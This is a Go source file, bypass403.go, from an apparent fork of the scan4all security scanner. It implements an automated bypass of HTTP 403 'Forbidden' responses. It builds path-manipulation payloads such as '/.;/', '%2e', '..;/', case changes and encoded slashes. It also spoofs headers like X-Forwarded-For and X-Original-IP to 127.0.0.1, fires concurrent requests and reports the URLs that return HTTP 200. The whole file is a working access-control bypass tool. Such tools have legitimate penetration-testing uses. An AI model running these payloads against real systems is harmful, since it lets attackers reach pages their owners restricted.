forked from GhostTroops/scan4all
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathbypass403.go
130 lines (117 loc) · 2.58 KB
/
bypass403.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
package brute
import (
"context"
"github.com/hktalent/scan4all/lib/util"
"net/http"
"regexp"
"strings"
"sync"
"time"
)
var (
reURL = regexp.MustCompile("^https?://")
headerPayloads = []string{
"X-Custom-IP-Authorization",
"X-Originating-IP",
"X-Forwarded-For",
"X-Remote-IP",
"X-Client-IP",
"X-Host",
"X-Forwarded-Host",
"X-ProxyUser-Ip",
"X-Remote-Addr",
}
)
const (
headerValue string = "127.0.0.1"
)
type Result403 struct {
Url string
Ok bool
Err error
}
func getValidDomain(domain string) string {
trimmedDomain := strings.TrimSpace(domain)
if !reURL.MatchString(trimmedDomain) {
trimmedDomain = "https://" + trimmedDomain
}
return trimmedDomain
}
func constructEndpointPayloads(domain, path string) []string {
return []string{
domain + "/" + strings.ToUpper(path),
domain + "/" + path + "/",
domain + "/" + path + "/.",
domain + "//" + path + "//",
domain + "/./" + path + "/./",
domain + "/./" + path + "/..",
domain + "/;/" + path,
domain + "/.;/" + path,
domain + "//;//" + path,
domain + "/" + path + "..;/",
domain + "/%2e/" + path,
domain + "/%252e/" + path,
domain + "/%ef%bc%8f" + path,
}
}
func PenetrateEndpoint(wg *sync.WaitGroup, url string, rst chan Result403, header ...string) {
ctx, cancel := context.WithTimeout(util.Ctx_global, 20*time.Second)
defer func() {
cancel()
wg.Done()
}()
req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)
if err != nil {
rst <- Result403{Ok: false, Url: url, Err: err}
return
}
var h string
if header != nil {
h = header[0]
req.Header.Set(h, headerValue)
}
resp, err := http.DefaultClient.Do(req)
if err != nil {
rst <- Result403{Ok: false, Url: url, Err: err}
return
}
defer resp.Body.Close()
if resp.StatusCode != 200 {
rst <- Result403{Ok: false, Url: url, Err: err}
return
} else {
rst <- Result403{Ok: true, Url: url, Err: err}
return
}
}
// 403 bypass
func ByPass403(domain, path *string, wg *sync.WaitGroup) []string {
validDomain := getValidDomain(*domain)
validPath := strings.TrimSpace(*path)
endpoints := constructEndpointPayloads(validDomain, validPath)
var xL int = len(endpoints) + len(headerPayloads)
var x01 = make(chan Result403, xL)
wg.Add(xL)
for _, e := range endpoints {
go PenetrateEndpoint(wg, e, x01)
}
for _, h := range headerPayloads {
go PenetrateEndpoint(wg, validDomain+"/"+validPath, x01, h)
}
aR := []string{}
var n = 0
BreakAll:
for {
select {
case x02 := <-x01:
n = n + 1
if x02.Ok {
aR = append(aR, x02.Url)
}
if n >= xL {
break BreakAll
}
}
}
return aR
}